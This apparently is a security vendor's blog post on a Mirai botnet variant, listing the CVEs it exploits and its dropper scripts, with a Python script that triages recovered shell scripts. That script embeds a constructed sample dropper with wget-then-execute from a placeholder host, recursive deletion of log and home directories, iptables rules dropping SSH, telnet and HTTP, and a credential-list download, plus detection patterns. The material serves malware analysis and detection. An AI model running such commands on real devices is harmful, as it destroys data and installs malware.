Security flaws in D-Link, Netgear, and SonicWall devices, among others, are being abused by a newly discovered variant of Mirai. Since February, this variant has targeted six known vulnerabilities along with three previously unknown ones to infect devices and add them to its botnet.
What Transpired?
More than 60 Mirai variants have been observed so far, each taking advantage of known or unknown vulnerabilities in IoT devices. The recent attacks are based on a new variant of Mirai's source code that adds exploits for several more vulnerabilities in IoT and network devices.
- Known vulnerabilities exploited by the botnet: SonicWall SSL-VPN; D-Link DNS-320 (CVE-2020-25506); Yealink Device Management (CVE-2021-27561 and CVE-2021-27562); Netgear ProSAFE Plus (CVE-2020-26919); Micro Focus Operations Bridge Reporter (CVE-2021-22502); and the Netis WF2419 router (CVE-2019-19356).
- In addition, the botnet uses two remote code execution (RCE) exploits against as yet unidentified targets, one for a command-injection vulnerability and the other for a flaw in a Common Gateway Interface (CGI) handler, plus a further exploit that abuses an op_type parameter vulnerable to command injection.
Using Binaries –
After the initial infection, the botnet uses the wget utility to download a shell script from the malware's infrastructure. That shell script then downloads and executes several Mirai binaries one by one.
- Lolol[.]sh: deletes key folders from the target machine and creates packet-filter rules that block incoming traffic to the commonly used SSH, HTTP and telnet ports.
- Install[.]sh: downloads files and packages such as GoLang v1.9.4, the nbrute binaries, and the combo[.]txt file, which contains multiple credential combinations that nbrute uses for brute-forcing.
- Dark.[arch]: used mainly for propagation, by launching the Mirai exploits described above. It can also brute-force SSH connections using credentials hardcoded in the binary.
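As an added example (not code from this write-up or from the malware itself), the following Python script triages a shell script recovered from a compromised device for the behaviours listed above: a wget download followed by execution of the fetched file, iptables rules dropping inbound SSH, telnet and HTTP, recursive deletion of system directories, and retrieval of a credential combo list. The SAMPLE_SCRIPT and BENIGN_SCRIPT inputs are constructed stand-ins, and the hostnames, file names and rule names in it are assumptions for illustration only.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample, not a real dropper: it imitates the behaviours the
# write-up attributes to the downloaded shell script and to lolol.sh /
# install.sh. Hostnames, file names and paths are placeholders.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
rm -rf /var/log /home /root/.ssh
wget http://example.invalid/dark.x86 -O dark.x86
chmod +x dark.x86
./dark.x86
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
wget http://example.invalid/combo.txt -O /tmp/combo.txt
"""

# Constructed benign script: a firewall rule that allows, rather than drops,
# admin traffic must not be flagged.
BENIGN_SCRIPT = """#!/bin/sh
apt-get update
iptables -A INPUT -p tcp --dport 22 -s 10.0.0.0/8 -j ACCEPT
"""


@dataclass(frozen=True)
class Finding:
    rule: str      # which behaviour matched
    line_no: int   # 1-based line in the script
    line: str      # the offending line, stripped


DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*https?://")
OUTPUT_FLAG_RE = re.compile(r"(?:-O|-o)\s+(\S+)")
URL_BASENAME_RE = re.compile(r"https?://\S+/([^/\s]+)")
EXEC_RE = re.compile(r"^(?:\./|sh\s+|bash\s+)(\S+)")
FIREWALL_DROP_RE = re.compile(r"\biptables\b.*--dport\s+(\d+)\b.*-j\s+DROP\b")
RM_RE = re.compile(r"\brm\s+-\w*r\w*\s+(.+)$")
COMBO_RE = re.compile(r"\bcombo\S*\.txt\b")

# Ports the write-up says lolol.sh firewalls off (SSH, telnet, HTTP).
ADMIN_PORTS = {"22", "23", "80"}
# Directories whose recursive deletion on a device is a red flag (assumed list).
SENSITIVE_PREFIXES = ("/var/log", "/home", "/root", "/etc", "/bin", "/usr")


def _download_name(line: str) -> Optional[str]:
    """Basename the downloaded file will have on disk, if it can be inferred."""
    m = OUTPUT_FLAG_RE.search(line)
    if m:
        return m.group(1).rsplit("/", 1)[-1]
    m = URL_BASENAME_RE.search(line)
    return m.group(1) if m else None


def triage_script(text: str) -> List[Finding]:
    """Walk the script line by line and record dropper-like behaviours."""
    findings: List[Finding] = []
    downloaded: Set[str] = set()  # files fetched earlier in the script
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_RE.search(line):
            findings.append(Finding("remote_download", line_no, line))
            name = _download_name(line)
            if name:
                downloaded.add(name)
        m = EXEC_RE.match(line)
        if m and m.group(1).rsplit("/", 1)[-1] in downloaded:
            findings.append(Finding("download_then_execute", line_no, line))
        m = FIREWALL_DROP_RE.search(line)
        if m and m.group(1) in ADMIN_PORTS:
            findings.append(Finding("blocks_admin_port", line_no, line))
        m = RM_RE.search(line)
        if m and any(p.startswith(SENSITIVE_PREFIXES) for p in m.group(1).split()):
            findings.append(Finding("deletes_system_dirs", line_no, line))
        if COMBO_RE.search(line):
            findings.append(Finding("credential_list", line_no, line))
    return findings


def is_suspicious(findings: List[Finding]) -> bool:
    """Download-then-execute alone is decisive; otherwise require 3 distinct rules."""
    rules = {f.rule for f in findings}
    return "download_then_execute" in rules or len(rules) >= 3


if __name__ == "__main__":
    result = triage_script(SAMPLE_SCRIPT)
    for f in result:
        print(f"line {f.line_no:>2} {f.rule:<24} {f.line}")
    print("verdict:", "suspicious" if is_suspicious(result) else "clean")
```

The download-then-execute correlation is the part worth keeping even if the other patterns are tuned: a script that fetches a file and immediately runs it is the core of the post-exploitation flow described above, whereas a lone iptables DROP or a lone rm is common in legitimate provisioning scripts, which is why those only count toward a verdict in combination.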
One of the most important lessons from the Mirai botnet so far is that unpatched connected devices are always a security risk. It is therefore highly important to regularly update IoT devices and apply firmware patches. Additionally, our internal experts recommend changing the default credentials of IoT devices to stay protected from such attacks.
To read more, please check eScan Blog